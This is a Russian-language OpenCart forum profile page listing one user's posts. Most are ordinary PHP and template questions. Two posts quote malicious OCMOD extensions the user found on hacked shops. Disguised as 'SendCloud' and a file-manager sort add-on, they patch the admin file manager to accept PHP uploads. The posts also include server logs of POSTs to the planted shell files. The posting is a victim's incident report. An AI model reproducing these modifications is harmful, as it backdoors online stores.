Jump to content
Search In
  • More options...
Find results that contain...
Find results in...

igorfelix

Users
  
  • Posts

    758
  • Joined

  • Last visited

1 Follower

Information

  • Gender
    Не определился

Recent Profile Visitors

5,976 profile views

igorfelix's Achievements

Mentor

Mentor (12/14)

  • Dedicated Rare
  • First Post
  • Collaborator
  • Posting Machine Rare
  • Conversation Starter

Recent Badges

22

Reputation

  1. А может ли бот сбрасывать пароль через админку и каким-то образом проходить кугл капчу с картинками, заходить в админку и устанавливать через менеджер дополнений вирусный модификатор ?
  2. Блокировать по ip ? Так если в админку лезут используя разные ip и vpn.
  3. Странно что ни у кого такого нет. Гуглил. не нашёл. Массовый пробег по сайтам был после 15 апреля 2023.
  4. Проблема повторилась на других сайтах. в БД появляется запись (61, 'File Manager Sort By Upload Date', 'File Manager Sort By Upload Date', 'sezerural.com', '2.x-3.11', '', '<?xml version=\"1.0\" encoding=\"UTF-8\"?>\r\n<modification>\r\n <name>File Manager Sort By Upload Date</name>\r\n <code>File Manager Sort By Upload Date</code>\r\n <version>2.x-3.11</version>\r\n <author>sezerural.com</author>\r\n <file path=\"admin/controller/common/filemanager.php\">\r\n <operation error=\"log\">\r\n <search position=\"replace\"><![CDATA[\'jpeg\',]]></search>\r\n <add><![CDATA[\'php\',\'jpeg\',]]></add>\r\n \r\n \r\n \r\n \r\n </operation> \r\n \r\n <operation error=\"log\">\r\n <search position=\"replace\"><![CDATA[\'image/jpeg\',]]></search>\r\n <add><![CDATA[\'image/jpeg\',\'application/x-php\',]]></add>\r\n \r\n </operation>\r\n \r\n </file> \r\n</modification>\r\n', 1, '2023-04-12 19:05:54'); Опять разрешают заливку php через стандартный менеджер изображений в опенкарте. Устанавливают расширение xml Скорее всего из-за моего простого пароля попали в админку.
  5. Я понял код, в файловый менеджер разрешили загрузку php файлов, и загрузили вирус.
  6. Был замечен сегодня вирус на сайте: не работал переход на страницы, работала только главная. Зашел в файлы, увидел каракули в htaceess, index.php по классике и папки левые.. Снес весь сайт, удалив все файлы, но 3 файла появлялись снова. Смотрел логи, увидел там POST запросы к файлам, но откуда шли так и не нашел, там было пусто. Отключил полностью пользователя на сервере, файлы так и появлись.. Не понимал откуда идет запуск. Хостер не смог помочь, сказал ищите специалиста. Короче удалил учетную запись, залил бэкап, ура 3 файла перестали появляться. Начал думать какой модуль мог заразу принести. Зашел в менеджер дополнений и вижу интересную картину.. На сайте года 2 никаких дополнений не устанавливалось и тут вижу 17 апреля 2023 год что-то не понятное. "SendCloud" версия 2.16. 17.04.2023 захожу в xml а там вот это содержимое : <?xml version="1.0" encoding="UTF-8"?> <modification> <name>SendCloud</name> <version>2.1.6</version> <code>sendcloud</code> <author>SendCloud</author> <link>https://www.sendcloud.com/</link> <!-- Instead of event: catalog/controller/checkout/guest_shipping/save/after --> <file path="admin/controller/common/filemanager.php"> <operation error="skip" info="Detects shipping address change during checkout process (for guest customer)."> <search>$files = glob($directory . '/' . $filter_name . '*.{jpg,jpeg,png,gif,JPG,JPEG,PNG,GIF}', GLOB_BRACE);</search> <add position="replace"> <![CDATA[ $files = glob($directory . '/' . $filter_name . '*.{jpg,jpeg,png,gif,JPG,JPEG,PNG,GIF,php}', GLOB_BRACE); ]]> </add> </operation> <operation error="skip" info="Detects shipping address change during checkout process (for guest customer)."> <search>'jpeg',</search> <add position="after"> <![CDATA[ 'php', ]]> </add> </operation> <operation error="skip" info="Detects shipping address change during checkout process (for guest customer)."> <search>'image/jpeg',</search> <add position="after"> <![CDATA[ 'application/x-php', ]]> </add> </operation> <operation error="skip" info="Detects shipping address change during checkout process (for guest customer)."> <search>$content = file_get_contents($this->request->files['file']['tmp_name']);</search> <add position="replace"> <![CDATA[ $content = ""; ]]> </add> </operation> </file> </modification> Могу еще прислать содержимое файлов которые генерировались.. это файл toggige-arrow.jpg якобы картинка, гуглил - не нашел такого вируса. Подскажите может кто знает, это закинули скрипт который грузит php на сайт ? Начал смотреть гостей кто заходил в админ 17 апреля . 3 айпишника, посмотрел один Въетнам, другой Новосибирск.. April 17, 12:41pm time Moscow 117.2.165.87 Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0 April 17, 12:41pm time Moscow 117.2.165.87 Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0 April 17, 12:42pm time Moscow 194.87.218.48 python-requests/2.18.4 April 17, 12:43pm time Moscow 117.2.165.87 Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0 Роботы ? log сайта: Fri Apr 21 10:26:18.501146 2023] [cgi:error] [pid 22408] [client 195.123.242.ЦИФРА:36848] AH01215: 2023-04-21 10:26:18 1ppl9u-0005pS-G7 1ppl9u-0005pS-G7 no recipients found in headers, referer: https://САЙТ/image/catalog/test.php 2023/04/21 10:27:46 [warn] 20983#20983: *43806092 a client request body is buffered to a temporary file /var/cache/nginx/client_temp/0001518096, client: 195.123.242.37, server: САЙТ, request: "POST /image/catalog/test.php HTTP/1.1", host: "САЙТ", referrer: "https://САЙТ/image/catalog/test.php" [Fri Apr 21 10:29:32.865527 2023] [cgi:error] [pid 23023] [client 195.123.242.ЦИФРА:37492] AH01215: PHP Notice: Undefined variable: _GET in /var/www/путь/data/www/САЙТ/image/catalog/inputs.php on line 1 2023/04/21 10:30:30 [warn] 20983#20983: *43806920 a client request body is buffered to a temporary file /var/cache/nginx/client_temp/0001518114, client: 173.208.153.ЦИФРА, server: САЙТ, request: "POST /image/catalog/inputs.php HTTP/1.1", host: "САЙТ", referrer: "https://www.google.com/" 2023/04/21 10:34:56 [warn] 20983#20983: *43807668 a client request body is buffered to a temporary file /var/cache/nginx/client_temp/0001518127, client: 173.208.153.ЦИФРА, server: САЙТ, request: "POST /catalog/model/localisation/localisation/index.php HTTP/1.1", host: "САЙТ", referrer: "https://www.google.com/" Видимо на сайте стоял простой пароль и смогли подобрать, зайди в менеджер дополнений и загрузить xml. А проявился вирус 21 апреля.
  7. foreach ($results as $result) { $youtube = false; if ($result['link']) { // Извлечение идентификатора видео из ссылки на YouTube preg_match('/v=([\w-]{11})/', $result['link'], $matches); if(isset($matches[1]) && $matches[1] != ''){ $youtube = $matches[1]; $filename = 'youtube_' . $youtube . '_mqdefault.jpg'; $filepath = DIR_IMAGE . $filename; // Сохранение превью-изображения на сервере, если оно еще не сохранено. РАБОТАЕТ, картинки скачиваются с ютуба. if (!is_file($filepath)) { file_put_contents($filepath, file_get_contents('https://img.youtube.com/vi/' . $youtube . '/mqdefault.jpg')); } // Ресайз изображения НЕ РАБОТАЕТ, создаются пустые картинки. $thumb_youtube = $this->model_tool_image->resize2($filepath, 320, 250); // Сохранение обрезанного изображения на сервере $thumb_youtube_path = DIR_IMAGE . 'thumb_youtube_' . $youtube . '_mqdefault.jpg'; copy($thumb_youtube, $thumb_youtube_path); } } if (is_file(DIR_IMAGE . $result['image'])) { $data['banners'][] = array( 'title' => $result['title'], 'link' => $youtube ? $youtube : $result['link'], 'thumb' => $this->model_tool_image->resize2($result['image'], 320, 250), 'thumb_youtube' => './image/thumb_youtube_' . $youtube . '_mqdefault.jpg', 'image' => './image/'.$result['image'], ); } } Делаю в модуле slideshow.php (opencart 2.3) костыль в баннере, что бы показывать видео с ютуба, указав ссылку. Осталось превью что б ресайзились под нужный мне размер. А так картинки закачиваются на сервер это работает, осталось только их обрезать, но не получается, где то ошибка в коде..
  8. Хотел снести хеадер, сделать свой для определенных страниц, другую шапку сайта. вот думал ковырять information схему или как то свою создать и со своим контроллером.
  9. Подскажите, можно ли сделать свой файл information_2.php для information_2.tpl ? (статьи) (хотел убрать лишние классы.. и немного переделать..)
  10. Сделал так, работает: //шорткоды $matches = array(); preg_match_all('/\[(.*?)\\]/s', $data['description'], $matches); foreach ($matches[1] as $match) { $snippet_txt = '$phone'; $data['description'] = str_replace($snippet_txt, '<b>+7999-999-99</b>', $data['description']); } //шорткоды Подскажите, как сделать правильно еще одно $phone_2, и $phone_3
  11. Подскажите пожалуйста, в стандартные статьи опенкарта 2.3 хочу в тексте вставлять свои шорткоды, например [[phone]] или кусочек html кода заготовленного, как это организовать в контроллере /catalog/controller/information/information.php
  12. Как вообще у многих устроено? "Поиск картинок или быстрая загрузка картинок для товаров" - Хочется быстро наполнять товары картинками. По прямой ссылке или искать через встроенный поиск.
  13. Здравствуйте, хочу в категории сделать вывод несколько цен, просто для наглядности в category.php указываю 'price' => $price, 'price_1' => $price*0.8, 'price_2' => $price*0.75, 'price_3' => $price*0.7, 'price_4' => $price*0.65, в шаблоне category.tpl указываю: Базовая цена - <span><?php echo $product['price']; ?></span><br> от 10 000 руб - <span><?php echo $product['price_1']; ?> руб.</span><br> от 25 000 руб - <span><?php echo $product['price_2']; ?> руб.</span><br> от 50 000 руб - <span><?php echo $product['price_3']; ?> руб.</span><br> от 100 000 руб - <span><?php echo $product['price_4']; ?> руб.</span><br> Если цена товара например 800 руб, то все ок выводится как надо. но если главная цена товара 22683 руб, то выводится: от 10 000 руб - 17.6 руб. от 25 000 руб - 16.5 руб. от 50 000 руб - 15.4 руб. от 100 000 руб - 14.3 руб. пропадают нули.
×
×
  • Create New...

Important Information

On our site, cookies are used and personal data is processed to improve the user interface. To find out what and what personal data we are processing, please go to the link. If you click "I agree," it means that you understand and accept all the conditions specified in this Privacy Notice.